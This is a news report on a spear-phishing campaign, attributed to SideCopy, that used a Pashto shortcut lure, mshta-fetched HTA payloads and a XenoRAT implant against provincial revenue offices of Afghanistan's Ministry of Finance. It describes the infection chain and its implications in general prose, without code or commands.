Afghanistan’s Ministry of Finance has been targeted in a precision spear-phishing campaign that sought to compromise provincial revenue offices through a customised XenoRAT implant, marking a focused cyber-espionage operation against one of the country’s most sensitive civilian administrative networks.The campaign has been linked with medium-to-high confidence to SideCopy, a Pakistan-linked threat actor associated with the broader Transparent Tribe, or APT36, ecosystem. The operation targeted the ministry’s provincial revenue and finance directorates, known as Mustoufiats, across all 34 provinces, indicating an effort to reach officials handling taxation, revenue collection and financial administration outside Kabul’s central bureaucracy.
The attack began with a ZIP archive delivered through spear-phishing. Inside was a malicious Windows shortcut file disguised as a legitimate document and crafted in Pashto, a choice that points to close awareness of the target environment. The lure referred to a list of employees introduced to an intellectual and psychological warfare seminar, a title designed to appear plausible to government staff.
Once opened, the shortcut invoked mshta. exe, a legitimate Windows utility often abused by attackers to run malicious HTML application payloads. The malware then fetched a remote HTA payload from a compromised Afghan education domain, allowing the operator to execute script content without immediately dropping a conventional executable file to disk. This “living-off-the-land” technique helps malicious activity blend into normal Windows processes and weakens basic signature-based detection.
The decoy document used in the campaign was particularly notable. It appeared to be a provincial staff directory linked to the Ministry of Finance, listing officials such as finance directors, revenue chiefs, financial officers and secretaries, along with mobile numbers. The document was written in Dari and Pashto and covered all 34 provinces. Such granular administrative detail suggests pre-attack reconnaissance and raises the possibility that the attackers had already collected internal or semi-internal information before launching the operation.
The infection chain used several stages to reduce visibility. After the initial shortcut launched the remote payload, the malware created files under public Windows directories and used obfuscated JavaScript, batch scripts, registry entries and. NET-based loaders to sustain execution. Persistence was achieved by creating startup mechanisms that could survive reboot, including registry-based autorun entries camouflaged to resemble legitimate Microsoft Edge-related activity.
The final payload was XenoRAT 1.8.7, an open-source remote access trojan that has been adapted by threat actors for surveillance and post-exploitation activity. Once active, it connected to attacker-controlled command-and-control infrastructure through a hard-coded IP address and port configuration. The implant used encrypted TCP communication, compressed traffic and reconnection logic to maintain access to compromised hosts.
XenoRAT’s functions make it particularly damaging in a government finance environment. The malware can collect system information, execute commands remotely, upload and download files, monitor the clipboard, capture screenshots, log keystrokes and access webcam or microphone functions. It can also load external modules in memory, allowing the operator to expand capabilities without deploying new files that may be easier to detect.
The use of XenoRAT reflects a wider trend among South Asia-focused espionage groups: the adaptation of open-source malware into tailored implants. Open-source tools reduce development costs and complicate attribution because multiple groups can use similar code. SideCopy has previously used remote access trojans and staged payloads in operations against government, defence and public-sector targets in the region, with a pattern of abusing trusted Windows utilities, compressed archives and socially tailored lures.
The infrastructure behind the Afghanistan campaign was split across delivery and command layers. The initial payload was hosted through an Afghan domain, while the RAT beaconed to separate European hosting infrastructure. This separation can help attackers preserve access if one element is detected and removed. The delivery domain’s use of local-looking infrastructure also appears designed to lower suspicion among targets.
For Afghanistan’s Ministry of Finance, the implications extend beyond infected workstations. Provincial revenue offices hold operational data on tax administration, personnel, communications and financial flows. Access to such systems could allow an espionage actor to map administrative structures, identify key officials, monitor internal correspondence or collect material useful for follow-on social engineering.
The targeting of provincial offices rather than only the central ministry suggests a strategy aimed at weaker endpoints in a distributed bureaucracy. Provincial directorates may have uneven cyber-defence capacity, older Windows systems, limited monitoring and fewer specialist staff than central agencies. Attackers often exploit such gaps to establish footholds that can later be used to move through connected networks.
Topics
Technology